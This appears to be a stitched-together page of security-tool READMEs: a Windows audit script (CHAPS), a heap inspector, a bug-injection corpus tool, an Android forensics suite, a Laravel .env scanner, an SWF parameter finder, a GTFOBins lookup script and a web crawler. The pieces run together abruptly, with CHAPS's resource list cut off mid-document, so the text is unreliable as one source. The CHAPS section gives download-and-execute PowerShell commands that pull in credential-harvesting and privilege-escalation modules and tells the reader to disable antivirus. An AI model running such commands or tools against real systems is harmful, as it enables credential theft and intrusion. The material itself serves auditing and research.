CHAPS is a PowerShell script for checking system security settings where additional software and assessment tools, such as Microsoft Policy Analyzer, cannot be installed. The purpose of this script is to run it on a server or workstation to collect configuration information about that system. The information collected can then be used to provide recommendations (and references) to improve the security of the individual system and systemic issues within the organization's Windows environment. Examples of environments where this script is useful include Industrial Control System (ICS) environments where systems cannot be modified. These systems include Engineer / Operator workstations, Human Machine Interface (HMI) systems, and management servers that are deployed in production environments.
This script is NOT intended to be a replacement for Microsoft's Policy Analyzer. The best way to audit a system's configuration is to use the Microsoft Security Compliance Toolkit and Policy Analyzer with a Windows Workstation Security Baseline GPO. The Policy Analyzer's output can be exported to an MS Excel file, but that requires Microsoft Excel to be installed on the system. Cutting and pasting this information does work, but might not be an option on a physical system. Also, using the Policy Analyzer requires installation of the Windows software, which may not be permitted.
This script runs in PowerShell and should be PowerShell-version independent. Some checks may fail depending on the Windows version, system configurations, and whether or not it is run with Administrator privileges. Instances where commands did not run successfully are noted and should be manually investigated where possible.
This script was developed using information from several sources (noted in Useful Resources section) to identify recommended security configurations to reduce the likelihood of a compromised system and to log user events conducted on the system. It pulls heavily from the Securing Windows Workstations baseline outlined by Sean Metcalf.

How To Use
The best way to run this script within an ICS environment is to not write any programs or scripts to the system being reviewed. Do this by serving the scripts from a web server running on another system on the network. Download CHAPS and PowerSploit into the same directory, open a terminal and change into that directory. Using Python 3, run the command 'python3 -m http.server 8181'. This will start a web server listening on all of the system's IP addresses.
On the target system open a CMD.exe window, preferably as an Administrator. Run the command powershell.exe -exec bypass to begin a PowerShell prompt. From this prompt, run the following command to execute the chaps.ps1 script.
IEX (New-Object Net.WebClient).DownloadString('http://<webserver>:8181/chaps/chaps.ps1')
To run the chaps-powersploit.ps1 script, be sure to turn off the system's anti-virus, including real-time protection. Running the following commands will import the appropriate PowerSploit scripts and then run them.
IEX (New-Object Net.WebClient).DownloadString('http://<webserver>:8181/PowerSploit/Recon/PowerView.ps1')
IEX (New-Object Net.WebClient).DownloadString('http://<webserver>:8181/PowerSploit/Exfiltration/Get-GPPPassword.ps1')
IEX (New-Object Net.WebClient).DownloadString('http://<webserver>:8181/PowerSploit/Exfiltration/Get-GPPAutologon.ps1')
IEX (New-Object Net.WebClient).DownloadString('http://<webserver>:8181/PowerSploit/Exfiltration/Get-VaultCredential.ps1')
IEX (New-Object Net.WebClient).DownloadString('http://<webserver>:8181/PowerSploit/Privesc/PowerUp.ps1')
IEX (New-Object Net.WebClient).DownloadString('http://<webserver>:8181/chaps/chaps-powersploit.ps1')
Each script's outputs will be written to the user's Temp directory as defined by the $env:temp variable. Copy these files off of the system being reviewed, delete them, and, if necessary, restart the system's anti-virus.

System Configuration Checks

System Info Command

System Information
  • Administrator rights
    • This check determines if the user running the script has administrator rights. Some checks may not work without admin rights. Most of the checks will work, unless some security controls or configurations prevent it.
    • There is an error suppression line that has been disabled. Uncomment the line to suppress all errors. The "-ErrorAction SilentlyContinue" has also been used on some of the commands within the script.
  • System information
    • System Version
    • User and Path Information
    • System IPv4 addresses.
    • System IPv6 addresses.
    • Windows AutoUpdate configuration.
    • Check for missing Critical and Important Updates
    • Check for BitLocker Disk Encryption
    • Check AlwaysInstallElevated Registry Keys
  • PowerShell Event Log Settings
    • Determine if PowerShell Commandline Auditing is Enabled.
    • Determine if PowerShell Module Logging is Enabled.
    • Determine if PowerShell Script Block and Invocation Logging is Enabled.
    • Determine if PowerShell Invocation Header Logging is Enabled.
    • Determine if PowerShell Protected Event Logging is Enabled.
  • Windows Event Log Configurations
    • Check the maximum log file settings for critical logs:
      • Application
      • System
      • Security
      • Windows PowerShell
      • Microsoft-Windows-TerminalServices-LocalSessionManager/Operational
      • Microsoft-Windows-TaskScheduler/Operational
      • Microsoft-Windows-SMBServer/Audit
      • Microsoft-Windows-Security-Netlogon/Operational
      • Microsoft-Windows-WinRM/Operational
      • Microsoft-Windows-WMI-Activity/Operational
  • PowerShell Configuration Settings
    • Version of default PowerShell
    • Check if PowerShell version 2 is permitted.
    • Determine installed versions of .NET to determine if they support PowerShell version 2.
    • Determine if PowerShell Language Mode is "ConstrainedLanguage".
  • Cached Credentials
    • Check how many Cached Credentials the system is configured to maintain.
  • Remote Access Configurations
    • Determine if RDP is configured to permit remote connections.
      • Check the setting of AllowRemoteRPC.
      • Check the setting of fDenyTSConnections.
    • Understand WinRM configuration.
      • Test if the WinRM Service is running using two different methods.
      • Check the Windows Firewall configuration to see if the rules to permit WinRM are enabled.
  • Local Administrator Accounts
    • Determine if more than one user is a member of the Local Administrator group.

CHAPS PowerSploit Security Checks
The PowerSploit project (dev branch) can be used to gather additional information about the system. The chaps-powersploit.ps1 script has been developed to gather this information. Of course, most anti-malware programs will prevent, protect against, and alert on the use of PowerSploit. Therefore, either the anti-malware should be disabled or the chaps-powersploit.ps1 script should not be used. NOTE: anti-malware programs should be re-enabled immediately upon verification that the script ran correctly.

chaps-powersploit.ps1 TODO:
Here is a list of things that aren't working, need to be addressed, or are possible feature requests.
  • Needs to be tested in a Domain environment.
  • Handle errors gracefully.
  • Identify new cmdlets to run, such as Find-InterestingFiles with a list of specific files related to ICS project files.

Secure Baseline Checks - Securing Windows Workstations
  • Check AppLocker
    • Determine if AppLocker is configured to monitor scripts, at a minimum.
  • Check EMET
    • If the Windows version is older than Windows 10, check that the EMET service is running.
  • Deploy LAPS
    • Determine if LAPS is installed. NOTE: not checking if it is configured or used.
  • Force Group Policy to reapply settings during “refresh”
    • Determine how NoGPOListChanges is configured to see if GPOs are applied every time they are checked.
  • Disable Net Session Enumeration
  • Disable WPAD
    • Check for a WPAD entry in the Windows "etc\hosts" file.
    • Check for the WpadOverride registry key.
    • Determine if the WinHTTPAutoProxySvc is running.
    • Check if the Windows Hotfix KB3165191 is installed.
    • Check WINS configuration.
    • Determine network adapter configurations for:
      • DNSEnabledForWINSResolution
      • WINSEnableLMHostsLookup
  • Disable LLMNR
    • Determine if DNSClient.EnableMulticast is disabled.
  • Disable Windows Browser Protocol
    • Determine if the Computer Browser service is running.
  • Disable NetBIOS
    • Check the setting of TcpipNetbiosOptions to determine if it is disabled.
  • Disable Windows Scripting
    • Check if Windows Scripting Host registry key is enabled.
    • Check if Windows Hotfix KB2871997 is installed.
    • NOTE: not sure how to check "Control Scripting File Extensions"
  • Prevent Interactive Login
    • Check the configuration of registry key LocalAccountTokenFilterPolicy to see if it is disabled.
  • Disable WDigest
    • Check the configuration of registry key WDigest.UseLogonCredential to determine if it is disabled.
  • Disable SMBv1
    • Use Get-SmbServerConfiguration to check:
      • If SMBv1 is disabled.
      • If SMBv1 auditing is enabled.
  • Block Untrusted Fonts on Windows 10
    • Check the registry key Kernel.MitigationOptions to determine if it is configured to block untrusted fonts.
  • Enable Credential / Device Guard on Windows 10
    • Check if the Credential Guard or HVCI service is running. NOTE: not checking configuration settings.
    • Check if Device Guard is configured. NOTE: not checking configuration settings.
  • Secure LanMan Authentication
    • Check if the registry key Lsa.NoLmHash is enabled.
    • Check if the registry key Lsa.LmCompatibilityLevel is configured to "Send NTLMv2 response only. Refuse LM & NTLM."
    • Check if Anonymous Enumeration of domain is restricted.
    • Check if Anonymous Enumeration of local system is restricted.
  • Secure Microsoft Office
    • Not implemented at this time.
  • Restrict RPC Clients
    • Determine if remote RPC client access is restricted.
  • Configure NTLM session security
    • Check NTLM Session Server Security settings to determine if it requires NTLMv2 and 128-bit encryption.
    • Check NTLM Session Client Security settings to determine if it requires NTLMv2 and 128-bit encryption.
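As an added example (not part of CHAPS or its scripts), the following read-only PowerShell audit implements a subset of the checks from both lists above: the Windows configuration checks (log sizes, PowerShell version and language mode, cached credentials, RDP and WinRM, local administrators) and the secure baseline checks (WDigest, LocalAccountTokenFilterPolicy, LanMan and NTLM settings, LLMNR, Windows Script Host, NetBIOS, SMBv1). It assumes an elevated PowerShell 5.1 session on Windows 10 / Server 2016 or later; the registry paths and expected values are Microsoft's documented locations for these settings, while the 100 MB log-size threshold and the one-administrator limit are illustrative choices, not CHAPS's own thresholds.

```powershell
# Added example, not part of CHAPS: a read-only audit of a subset of the checks
# listed above. It reads registry values, service state and event-log settings
# and changes nothing. Assumes an elevated PowerShell 5.1 session on
# Windows 10 / Server 2016 or later (Get-LocalGroupMember, Get-SmbServerConfiguration
# and Get-WindowsOptionalFeature are not available on older builds).

function Get-RegValue {
    # Returns the named registry value, or $null when the key or value is absent.
    param([string]$Path, [string]$Name)
    try { (Get-ItemProperty -Path $Path -Name $Name -ErrorAction Stop).$Name }
    catch { $null }
}

function Test-Setting {
    # Evaluates one check: $Pass receives the observed value and returns $true when it is acceptable.
    param([string]$Check, $Actual, [scriptblock]$Pass, [string]$Expected)
    $state = if ($null -eq $Actual -or "$Actual" -eq '') { 'NOT SET' } elseif (& $Pass $Actual) { 'PASS' } else { 'FAIL' }
    [pscustomobject]@{ Check = $Check; Actual = "$Actual"; Expected = $Expected; Result = $state }
}

$results = @()

# Logging: maximum size of the critical logs (100 MB is an illustrative threshold, not a CHAPS value).
foreach ($log in 'Application', 'System', 'Security', 'Windows PowerShell',
                 'Microsoft-Windows-TaskScheduler/Operational', 'Microsoft-Windows-WinRM/Operational') {
    $cfg = Get-WinEvent -ListLog $log -ErrorAction SilentlyContinue
    $results += Test-Setting "Log size: $log" $cfg.MaximumSizeInBytes { $args[0] -ge 100MB } '>= 100 MB'
}

# PowerShell: the v2 engine should be removed and the session should be in ConstrainedLanguage mode.
$ps2 = Get-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2 -ErrorAction SilentlyContinue
$results += Test-Setting 'PowerShell v2 engine' "$($ps2.State)" { $args[0] -ne 'Enabled' } 'Disabled'
$results += Test-Setting 'Language mode' "$($ExecutionContext.SessionState.LanguageMode)" { $args[0] -eq 'ConstrainedLanguage' } 'ConstrainedLanguage'

# Cached credentials (CachedLogonsCount is stored as a REG_SZ string).
$results += Test-Setting 'CachedLogonsCount' (Get-RegValue 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon' 'CachedLogonsCount') { [int]($args[0]) -le 1 } '<= 1'

# Remote access: RDP denied, WinRM and Computer Browser services stopped.
$results += Test-Setting 'RDP fDenyTSConnections' (Get-RegValue 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server' 'fDenyTSConnections') { $args[0] -eq 1 } '1 (RDP denied)'
foreach ($svc in 'WinRM', 'Browser') {
    $results += Test-Setting "Service $svc" "$((Get-Service $svc -ErrorAction SilentlyContinue).Status)" { $args[0] -ne 'Running' } 'Stopped'
}

# Local Administrators: more than one member is flagged (the limit is an illustrative choice).
$admins = @(Get-LocalGroupMember -Group Administrators -ErrorAction SilentlyContinue)
$results += Test-Setting 'Local Administrators members' $admins.Count { $args[0] -le 1 } '1'

# Secure baseline registry values: name, key, value, pass condition, expected value.
$lsa = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
$baseline = @(
    @('WDigest UseLogonCredential',    'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest', 'UseLogonCredential', { $args[0] -eq 0 }, '0'),
    @('LocalAccountTokenFilterPolicy', 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System', 'LocalAccountTokenFilterPolicy', { $args[0] -eq 0 }, '0'),
    @('Lsa NoLmHash',                  $lsa,          'NoLmHash',             { $args[0] -eq 1 }, '1'),
    @('Lsa LmCompatibilityLevel',      $lsa,          'LmCompatibilityLevel', { $args[0] -eq 5 }, '5 (NTLMv2 only, refuse LM & NTLM)'),
    @('Lsa RestrictAnonymous',         $lsa,          'RestrictAnonymous',    { $args[0] -ge 1 }, '>= 1'),
    @('Lsa RestrictAnonymousSAM',      $lsa,          'RestrictAnonymousSAM', { $args[0] -eq 1 }, '1'),
    @('NTLMMinServerSec',              "$lsa\MSV1_0", 'NTLMMinServerSec',     { $args[0] -eq 0x20080000 }, '0x20080000 (NTLMv2 + 128-bit)'),
    @('NTLMMinClientSec',              "$lsa\MSV1_0", 'NTLMMinClientSec',     { $args[0] -eq 0x20080000 }, '0x20080000 (NTLMv2 + 128-bit)'),
    @('LLMNR EnableMulticast',         'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient', 'EnableMulticast', { $args[0] -eq 0 }, '0'),
    @('Windows Script Host Enabled',   'HKLM:\SOFTWARE\Microsoft\Windows Script Host\Settings',  'Enabled',         { $args[0] -eq 0 }, '0')
)
foreach ($b in $baseline) {
    $results += Test-Setting $b[0] (Get-RegValue $b[1] $b[2]) $b[3] $b[4]
}

# NetBIOS over TCP/IP per IP-enabled adapter (2 = disabled) and SMBv1 state.
foreach ($nic in Get-CimInstance Win32_NetworkAdapterConfiguration -Filter 'IPEnabled = TRUE') {
    $results += Test-Setting "NetBIOS: $($nic.Description)" $nic.TcpipNetbiosOptions { $args[0] -eq 2 } '2 (disabled)'
}
$smb = Get-SmbServerConfiguration -ErrorAction SilentlyContinue
$results += Test-Setting 'SMBv1 enabled'  $smb.EnableSMB1Protocol { -not $args[0] } 'False'
$results += Test-Setting 'SMBv1 auditing' $smb.AuditSmb1Access    { $args[0] }      'True'

$results | Format-Table Check, Actual, Expected, Result -AutoSize
```

A NOT SET row means the key or value is absent, which is not the same as secure and has to be read against the platform default: an absent LocalAccountTokenFilterPolicy means remote UAC token filtering is on (the secure default), while an absent UseLogonCredential only means WDigest caching is off on Windows 8.1 / Server 2012 R2 and later, where that is the built-in default.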

CHAPS TODO:
Here is a list of things that aren't working, need to be addressed, or are possible feature requests.
  • Issues
    • WMI remoting and firewall rules may be required by Vulnerability scanning tools. Thus, if enabled, test for limiting to users and specific systems.
    • Fix PowerShell version 2 check
    • Fix .NET version check.
      • (Get-ChildItem 'HKLM:\SOFTWARE\Microsoft\NET Framework Setup\NDP' -Recurse -ErrorAction 0 | Get-ItemProperty -Name Version -ErrorAction 0) | Select-Object Version
  • Useful
    • Generate lines for reporting.
      • Marked so another script can scan the result and build finding and recommendation sections for a report.
    • Check for SYSMON Program.
    • Update checks so that they are Windows version specific, e.g. Windows 10, Windows 7, Windows 2018.
    • List Installed Programs (to include x86) and programs installed directly to C: drive
    • Detect and acquire version information for JAVA, flash, and Adobe.
  • Nice-To-Haves
    • Update with Domain tests, as a user specified option.
    • CMD-only (non-PowerShell) version.
    • Add checks from Carlos Perez's HoneyBadger plugin. Must be converted from Ruby to PowerShell.

Useful Resources:

Heapinspect - Inspect Heap In Python


HeapInspect is designed to make the heap much prettier to look at.
Now this tool is a plugin of nadbg. Try it!

Features
  • Free of gdb and other requirement
  • Multi glibc support
    • 2.19, 2.23-2.27 (currently tested)
    • both 32bit and 64bit
  • Nice UI to show heap
    • HeapShower (detailed)
    • PrettyPrinter (colorful, summary)
  • Heapdiff (working)
  • Corruption detect & exploit analysis (working)
  • Also support gdb (python2 only) :)

Usage

Quick shot
A quick use of this tool.





You can also use it as a gdb plugin, which is very useful when pwndbg or other plugins fail to analyse the heap.
sed -i "1i source `pwd`/gdbscript.py" ~/.gdbinit # alternatively, you can add that line manually
Note
HeapInspect does not support gdb with Python 3 for now. Anyone who can make it Python 3 compatible is welcome.




Basic
Pretty easy to use. I will make it a package later.
from time import sleep
from heapinspect.core import *

hi = HeapInspect(1234)  # pid of the target process here
hs = HeapShower(hi)

print(hs.fastbins)
print(hs.smallbins)
print(hs.largebins)
print(hs.unsortedbins)
print(hs.tcache_chunks)

hs.relative = 1  # relative mode (offsets from the heap/libc base), check Quick shot
print(hs.fastbins)

sleep(10)
# now assume that the heap state has changed
hs.update()  # use this to refresh

pp = PrettyPrinter(hi)
print(pp.all)  # pretty printer
pp.update()  # use this to update

Test
There are some testcases.
heapinspect/tests/ $ python test.py  #this will run all test cases for you to check this tool.
......
......
test case unsortedbins64 at test/testcases/libc-2.27/64bit
pid:6704
=========================           fastbins           =========================
=========================         unsortedbins         =========================
chunk(0x7f9aae2e6720): prev_size=0x0      size=0xb1     fd=0x7f9aacdfbca0  bk=0x7f9aae2e6880
chunk(0x7f9aae2e6880): prev_size=0x0      size=0xb1     fd=0x7f9aae2e6720  bk=0x7f9aacdfbca0
=========================          smallbins           =========================
=========================          largebins           =========================
=========================            tcache            =========================
tcache[9]:
chunk(0x7f9aae2e6670): prev_size=0x0      size=0xb1     fd=0x7f9aae2e65d0  bk=0x0
chunk(0x7f9aae2e65c0): prev_size=0x0      size=0xb1     fd=0x7f9aae2e6520  bk=0x0
chunk(0x7f9aae2e6510): prev_size=0x0      size=0xb1     fd=0x7f9aae2e6470  bk=0x0
chunk(0x7f9aae2e6460): prev_size=0x0      size=0xb1     fd=0x7f9aae2e63c0  bk=0x0
chunk(0x7f9aae2e63b0): prev_size=0x0      size=0xb1     fd=0x7f9aae2e6310  bk=0x0
chunk(0x7f9aae2e6300): prev_size=0x0      size=0xb1     fd=0x7f9aae2e6260  bk=0x0
chunk(0x7f9aae2e6250): prev_size=0x0      size=0xb1     fd=0x0             bk=0x0

Docs
Detailed docstrings have been written into the source code.
I have built a sphinx doc in docs. Just open docs/build/html/index.html with your browser.

Devlog

2018/12/10 Version 0.1.3
  • add support for gdb

2018/11/6 version 0.1.2
docs update.
  • update sphinx docs
  • reshape file structure

2018/11/5 version 0.1.1
not a functional update.
  • PEP8
  • docstrings
  • performance update

2018/10/31 version 0.1.0
first release
  • better cmdline option

2018/10/30 version 0.0.8
next version will be a release.
  • CRLF to LF
  • code refine
  • readme refine
  • pretty printer

2018/10/29 version 0.0.7
  • auto test
  • code refine

2018/10/27 version 0.0.6
This is not a stable version. I'm trying to fix bugs due to different glibc versions. I need help to test this.
  • add multi libc support
  • add x86 support

2018/10/26 version 0.0.5
next version will add multi libc support. heapdiff and heap check will be added later.
  • HeapShower
  • relative heap & libc offset showing
  • fix search loop bug
  • bins now search from bk instead of fd, as the manner of glibc

2018/10/24 version 0.0.4
  • HeapRecoder, I will make a heapdiff
  • smallbins and largebins

2018/10/23 version 0.0.3
  • fastbin prototype
  • unsortedbin prototype
  • bins prototype
  • tcache prototype

2018/10/22 version 0.0.2
  • add C_Struct to handle c structure

2018/10/19 version 0.0.1
  • add class HeapInspector
  • trying to parse more information of arena

2018/10/18 version 0.0.0
  • add class Proc in proc_util
  • experimental test in test.py



LAVA - Large-scale Automated Vulnerability Addition


Evaluating and improving bug-finding tools is currently difficult due to a shortage of ground truth corpora (i.e., software that has known bugs with triggering inputs). LAVA attempts to solve this problem by automatically injecting bugs into software. Every LAVA bug is accompanied by an input that triggers it whereas normal inputs are extremely unlikely to do so. These vulnerabilities are synthetic but, we argue, still realistic, in the sense that they are embedded deep within programs and are triggered by real inputs. Our work forms the basis of an approach for generating large ground-truth vulnerability corpora on demand, enabling rigorous tool evaluation and providing a high-quality target for tool developers.
LAVA is the product of a collaboration between MIT Lincoln Laboratory, NYU, and Northeastern University.

Quick Start
On a system running Ubuntu 16.04, you should be able to just run python2 setup.py. Note that this install script will install packages and make changes to your system. Once it finishes, you should have PANDA installed into panda/build/ (PANDA is used to perform dynamic taint analysis).
Next, run init-host.py to generate a host.json. This file is used by LAVA to store settings specific to your machine. You can edit these settings as necessary, but the default values should work.
Project configurations are located in the target_configs directory, where every configuration is located at target_configs/projectname/projectname.json. Paths specified within these configuration files are relative to values set in your host.json file.
Finally, you can run ./scripts/lava.sh to actually inject bugs into a program. Just provide the name of a project that is in the target_configs directory, for example:
./scripts/lava.sh toy
You should now have a buggy copy of toy!
If you want to inject bugs into a new target, you will likely need to make some modifications. Check out How-to-Lava for guidance.

Documentation
Check out the docs folder to get started.

Current Status

Version 2.0.0
Expected results from test suite:
Project       RESET    CLEAN    ADD      MAKE     TAINT    INJECT   COMP
blecho        PASS     PASS     PASS     PASS     PASS     PASS     PASS
libyaml       PASS     PASS     PASS     PASS     PASS     PASS     PASS
file          PASS     PASS     PASS     PASS     PASS     PASS     PASS
toy           PASS     PASS     PASS     PASS     PASS     PASS     PASS
pcre2         PASS     PASS     PASS     PASS     PASS     PASS     PASS
jq            PASS     PASS     PASS     PASS     PASS     PASS     PASS
grep          PASS     PASS     PASS     PASS     PASS     FAIL
libjpeg       PASS     PASS     PASS     PASS     FAIL
tinyexpr      PASS     PASS     PASS     PASS     FAIL
duktape       PASS     PASS     PASS     FAIL
tweetNaCl     PASS     PASS     FAIL
gzip          FAIL

Authors
LAVA is the result of several years of development by many people; a partial (alphabetical) list of contributors is below:
  • Andy Davis
  • Brendan Dolan-Gavitt
  • Andrew Fasano
  • Zhenghao Hu
  • Patrick Hulin
  • Amy Jiang
  • Engin Kirda
  • Tim Leek
  • Andrea Mambretti
  • Wil Robertson
  • Aaron Sedlacek
  • Rahul Sridhar
  • Frederick Ulrich
  • Ryan Whelan


Andriller - Software Utility With A Collection Of Forensic Tools For Smartphones


Andriller is a software utility with a collection of forensic tools for smartphones. It performs read-only, forensically sound, non-destructive acquisition from Android devices. Its features include powerful Lockscreen cracking for Pattern, PIN code, or Password, and custom decoders for app data from Android (and some Apple iOS and Windows) databases for decoding communications. Extraction and decoders produce reports in HTML and Excel formats.

Features
  • Automated data extraction and decoding
  • Data extraction from non-rooted devices via Android Backup (Android versions 4.x, varied/limited support)
  • Data extraction with root permissions: root ADB daemon, CWM recovery mode, or SU binary (Superuser/SuperSU)
  • Data parsing and decoding for Folder structure, Tarball files (from nanddroid backups), and Android Backup (backup.ab files)
  • Selection of individual database decoders for Android apps
  • Decryption of encrypted WhatsApp archived databases (.crypt to .crypt12, must have the right key file)
  • Lockscreen cracking for Pattern, PIN, Password (not gatekeeper)
  • Unpacking the Android backup files
  • Screen capture of a device's display screen

Python Requirements
  • 3.6+ (64-bit version recommended)
It is highly advised to set up a virtual environment and install Andriller and its dependencies in it. However, it is not essential, and the global environment can also be used. Depending on how Python was set up, it may be necessary to substitute python and pip with python3 and pip3 respectively in the instructions below.
Windows only: when installing Python from https://www.python.org, make sure Add Python to PATH is ticked.

System Dependencies
  • adb
  • python3-tk
[Ubuntu/Debian] Install from Terminal:
$ sudo apt-get install android-tools-adb python3-tk
[Mac] Install from brew cask:
$ brew cask install android-platform-tools
[Windows] : Included.

Installation (from PYPI, recommended)
$ pip install andriller -U

Installation (from source, editable)
$ pip install -e .

Quick Start (run GUI)
$ python -m andriller


laravelN00b - Automated Scan .env Files And Checking Debug Mode In Victim Host

An incorrect configuration can expose .env files or allow environment variables to be read. LaravelN00b automates scanning for .env files and checking whether debug mode is enabled on the victim host.



Scan rationale
  • Scan host.
  • Resolve the IP address and check for the .env file on that IP address
  • Check Laravel debug mode (read .env variables)

Installation
1 - Install with installer.sh
chmod +x installer.sh
./installer.sh
2 - Install manually
go get github.com/briandowns/spinner
go get github.com/christophwitzko/go-curl
go run main.go --hostname victim.host
or
go build -o laravelN00b main.go

Run
./laravelN00b --hostname victim.host


SWFPFinder - SWF Potential Parameters Finder


SWFPFinder is a simple, open source bash script designed to discover the potential parameters of a web app's SWF file by analysing the SWF file itself. SWFPFinder uses the swfmill tool; swfmill is a tool to process Adobe Flash (SWF) files. It can convert SWF from and to an XML dialect called "swfml", which is closely modeled after the SWF file format.

Install
$ wget https://raw.githubusercontent.com/m4ll0k/SWFPFinder/master/swfpfinder.sh

or

$ git clone https://github.com/m4ll0k/SWFPFinder.git swfpfinder
$ cd swfpfinder

Support Platforms
  • macOS
  • Linux
  • Windows (Cygwin)

Requirements
  • swfmill
    • for Linux: apt-get install swfmill
    • for macOS: brew install swfmill

Usage
$ bash swfpfinder.sh https://raw.githubusercontent.com/evilcos/xss.swf/master/xss.swf

Event
SecurityErrorEvent
xss_fla
MainTimeline
MovieClip
param
Object
action
String
cmd
attack
get_complete
get_sec_error
frame1
URLLoader
navigateToURL
URLRequest
_self
_blank
COMPLETE
addEventListener
SECURITY_ERROR
ExternalInterface
eval
call
alert
location
open
get
stop
root
loaderInfo
parameters
a
c
addFrameScript
EventDispatcher
DisplayObject
InteractiveObject
DisplayObjectContainer
Sprite


Gtfo - Search For Unix Binaries That Can Be Exploited To Bypass System Security Restrictions


This is a standalone script written in Python 3 for GTFOBins. You can search for Unix binaries that can be exploited to bypass system security restrictions. These binaries can be abused to break out of restricted shells, escalate privileges, transfer files, spawn bind and reverse shells, etc.
The functions are from https://github.com/GTFOBins/GTFOBins.github.io and all credit goes to its respective contributors. They are simplified (no need for environmental variables) and syntax highlighted.

Download
git clone https://github.com/t0thkr1s/gtfo

Install
The script has 2 dependencies:
You can install these by typing:
python3 setup.py install

Run
python3 gtfo.py [binary]

Screenshots




Disclaimer
This tool is only for testing and academic purposes and can only be used where strict consent has been given. Do not use it for illegal purposes! It is the end user’s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this tool and software.


Hakrawler - Simple, Fast Web Crawler Designed For Easy, Quick Discovery Of Endpoints And Assets Within A Web Application




hakrawler is a Go web crawler designed for easy, quick discovery of endpoints and assets within a web application. It can be used to discover:
  • Forms
  • Endpoints
  • Subdomains
  • Related domains
  • JavaScript files
The goal is to build the tool so that it can be easily chained with other tools, such as subdomain enumeration tools and vulnerability scanners, for example:
assetfinder target.com | hakrawler | some-xss-scanner

Features
  • Unlimited, fast web crawling for endpoint discovery
  • Fuzzy matching for domain discovery
  • robots.txt parsing
  • sitemap.xml parsing
  • Plain output for easy parsing into other tools
  • Accept domains from stdin for easier tool chaining
  • SQLMap-friendly output format
  • Link gathering from JavaScript files

Upcoming features

Contributors
  • hakluke wrote the tool
  • cablej cleaned up the code
  • Corben Leo added in functionality to pull links from JavaScript files

Thanks
  • codingo and prodigysml/sml555, my favourite people to hack with. A constant source of ideas and inspiration. They also provided beta testing and a sounding board for this tool in development.
  • tomnomnom who wrote waybackurls, which powers the wayback part of this tool
  • s0md3v who wrote photon, which I took ideas from to create this tool
  • The folks from gocolly, the library which powers the crawler engine
  • oxffaa, who wrote a very efficient sitemap.xml parser which is used in this tool
  • The contributors of LinkFinder where some awesome regex was stolen to parse links from JavaScript files.

Installation
  1. Install Golang
  2. Run the command below
go get github.com/hakluke/hakrawler
  3. Run hakrawler from your Go bin directory. For Linux systems it will likely be:
~/go/bin/hakrawler
Note that if you need to do this, you probably want to add your Go bin directory to your $PATH to make things easier!

Usage
Note: multiple domains can be crawled by piping them into hakrawler from stdin. If only a single domain is being crawled, it can be added by using the -domain flag.
$ hakrawler -h
Usage of hakrawler:
-all
Include everything in output - this is the default, so this option is superfluous (default true)
-auth string
The value of this will be included as a Authorization header
-cookie string
The value of this will be included as a Cookie header
-depth int
Maximum depth to crawl, the default is 1. Anything above 1 will include URLs from robots, sitemap, waybackurls and the initial crawler as a seed. Higher numbers take longer but yield more results. (default 1)
-domain string
The domain that you wish to crawl (for example, google.com)
-forms
Include form actions in output
-js
Include links to utilised JavaScript files
-outdir string
Directory to save discovered raw HTTP requests
-plain
Don't use colours or print the banners to allow for easier parsing
-robots
Include robots.txt entries in output
-schema string
Schema, http or https (default "http")
-scope string
Scope to include:
strict = specified domain only
subs = specified domain and subdomains
fuzzy = anything containing the supplied domain
yolo = everything (default "subs")
-sitemap
Include sitemap.xml entries in output
-subs
Include subdomains in output
-urls
Include URLs in output
-usewayback
Query wayback machine for URLs and add them as seeds for the crawler
-wayback
Include wayback machine entries in output
-linkfinder
Search all JavaScript files for more links. Note that these will not be complete links, only relative. Parsing full links from JavaScript is too resource intensive.

Basic Example

Command: hakrawler -domain bugcrowd.com -depth 1


Full text output:
   $ hakrawler -domain bugcrowd.com -depth 1

██╗ ██╗ █████╗ ██╗ ██╗██████╗ █████╗ ██╗ ██╗██╗ ███████╗██████╗
██║ ██║██╔══██╗██║ ██╔╝██╔══██╗██╔══██╗██║ ██║██║ ██╔════╝██╔══██╗
███████║██ ████║█████╔╝ ██████╔╝███████║██║ █╗ ██║██║ █████╗ ██████╔╝
██╔══██║██╔══██║██╔═██╗ ██╔══██╗██╔══██║██║███╗██║██║ ██╔══╝ ██╔══██╗
██║ ██║██║ ██║██║ ██╗█ ║ ██║██║ ██║╚███╔███╔╝███████╗███████╗██║ ██║
╚═╝ ╚═╝╚═╝ ╚═╝╚═╝ ╚═╝╚═╝ ╚═╝╚═╝ ╚═╝ ╚══╝╚══╝ ╚══════╝╚══════╝╚═╝ ╚═╝
Crafted with <3 by hakluke
[robots] http://bugcrowd.com/*?preview
[sitemap] https://bugcrowd.com/
[sitemap] https://bugcrowd.com/contact/
[sitemap] https://bugcrowd.com/faq/
[sitemap] https://bugcrowd.com/leaderboard/
[sitemap] https://bugcrowd.com/list-of-bug-bounty-programs/
[sitemap] https://bugcrowd.com/press/
[sitemap] https://bugcrowd.com/pricing/
[sitemap] https://bugcrowd.com/privacy/
[sitemap] https://bugcrowd.com/terms/
[sitemap] https://bugcrowd.com/resources/responsible-disclosure-program/
[sitemap] https://bugcrowd.com/resources/why-care-about-web-security/
[sitemap] https://bugcrowd.com/resources/what-is-a-bug-bounty/
[sitemap] https://bugcrowd.com/stories/movember/
[sitemap] https://bugcrowd.com/stories/riskio/
[sitemap] https://bugcrowd.com/stories/tagged/
[sitemap] https://bugcrowd.com/tour/
[sitemap] https://bugcrowd.com/tour/platform/
[sitemap] https://bugcrowd.com/tour/crowd/
[sitemap] https://bugcrowd.com/customers/programs/new
[sitemap] https://bugcrowd.com/portal/
[sitemap] https://bugcrowd.com/portal/user/sign_in/
[sitemap] https://bugcrowd.com/portal/user/sign_up/
[url] https://bugcrowd.com/user/sign_in
[subdomain] bugcrowd.com
[url] https://tracker.bugcrowd.com/user/sign_in
[subdomain] tracker.bugcrowd.com
[url] https://www.bugcrowd.com/
[subdomain] www.bugcrowd.com
[url] https://www.bugcrowd.com/products/how-it-works/
[url] https://www.bugcrowd.com/products/how-it-works/the-bugcrowd-difference/
[url] https://www.bugcrowd.com/products/platform/
[url] https://www.bugcrowd.com/products/platform/integrations/
